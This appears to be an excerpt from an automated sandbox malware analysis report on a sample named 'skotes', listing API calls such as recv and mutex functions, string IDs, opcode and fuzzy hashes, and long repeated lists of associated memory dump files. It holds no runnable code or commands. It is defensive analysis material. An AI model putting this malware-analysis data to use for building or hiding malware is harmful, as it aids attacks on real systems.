                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _xtime_get$Xtime_diff_to_millis2
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 2858396081-768041998
                                                                                                                • Opcode ID: 202356f7f2932968ad54a1fb8d4f41d0a3e34b337b6b5dcdc4edec2365917657
                                                                                                                • Instruction ID: 701754fa45ebf806c5e739fcba709c33883d6461e64df1bb4226fe82749c406f
                                                                                                                • Opcode Fuzzy Hash: 202356f7f2932968ad54a1fb8d4f41d0a3e34b337b6b5dcdc4edec2365917657
                                                                                                                • Instruction Fuzzy Hash: 90519171A00506CFDF22DF24E5D596977F4EF04710B36845AD806AB295D738FD41CBA4
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 32384418-768041998
                                                                                                                • Opcode ID: 4315853bad21f5e52b90395bc57bc4cb44e4b159ff3d22a5d239231036dd55fe
                                                                                                                • Instruction ID: 93a2b0b2a8a7d933bc491036c43895998d7bbcb3f7d3587f4cfaaab029a38148
                                                                                                                • Opcode Fuzzy Hash: 4315853bad21f5e52b90395bc57bc4cb44e4b159ff3d22a5d239231036dd55fe
                                                                                                                • Instruction Fuzzy Hash: 4A41E1B0A00605DFDF21EF64D948B5AB7F8FF14320F00452AE816D7281EB39EA05CB81
                                                                                                                APIs
                                                                                                                • __Mtx_destroy_in_situ.LIBCPMT ref: 00783B93
                                                                                                                • __Cnd_destroy_in_situ.LIBCPMT ref: 00783B99
                                                                                                                • __Mtx_destroy_in_situ.LIBCPMT ref: 00783BA2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 3308344742-768041998
                                                                                                                • Opcode ID: 01ffe13ed0e62874cf4e9805f8ca41f9b1385ce720a3d97efe354b6b523a7177
                                                                                                                • Instruction ID: 2e67554e0460b6d235dc83ce1fdf07c2de3620849be93fd8ac8b69c43ad3fded
                                                                                                                • Opcode Fuzzy Hash: 01ffe13ed0e62874cf4e9805f8ca41f9b1385ce720a3d97efe354b6b523a7177
                                                                                                                • Instruction Fuzzy Hash: AC31B2B1640A008FDB249F2CC889B5ABBE5EF44720F04465DE95ACB791DB3CED01CB90
                                                                                                                APIs
                                                                                                                • recv.WS2_32(?,?,00000004,00000000), ref: 0078E10B
                                                                                                                • recv.WS2_32(?,?,00000008,00000000), ref: 0078E140
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: recv
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 1507349165-768041998
                                                                                                                • Opcode ID: f53654dea121b5ad60775eaf4c55f909a46aeb8c8f1433e8d4bd22f2ea28304c
                                                                                                                • Instruction ID: da2d623dc3b9107c29c5ee498d765ebfa4f3272a77fff2d969a689add0c57592
                                                                                                                • Opcode Fuzzy Hash: f53654dea121b5ad60775eaf4c55f909a46aeb8c8f1433e8d4bd22f2ea28304c
                                                                                                                • Instruction Fuzzy Hash: 1231C771A402889BDB20DB6CDC85FAB77BCEB0C724F044625F514E72D1DB78A8458BA4
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16__freea
                                                                                                                • String ID: =L-t$Z{,m{
                                                                                                                • API String ID: 1635606685-3218568333
                                                                                                                • Opcode ID: 59ec5e52643598cc00c1ea05295ebc542ba8de80aa9cccea6fbb3d39d6ef0f02
                                                                                                                • Instruction ID: 2e0a48a17be6d5cdf73d40fdc8a10fd909ef82df454b38b61d845a2abaad2862
                                                                                                                • Opcode Fuzzy Hash: 59ec5e52643598cc00c1ea05295ebc542ba8de80aa9cccea6fbb3d39d6ef0f02
                                                                                                                • Instruction Fuzzy Hash: 8531907590021AABDB21AF65DC45FEF7BA9FF44B10F054128FD14AB151DB388D51C7A0
                                                                                                                APIs
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007B18A4
                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 007B18EB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
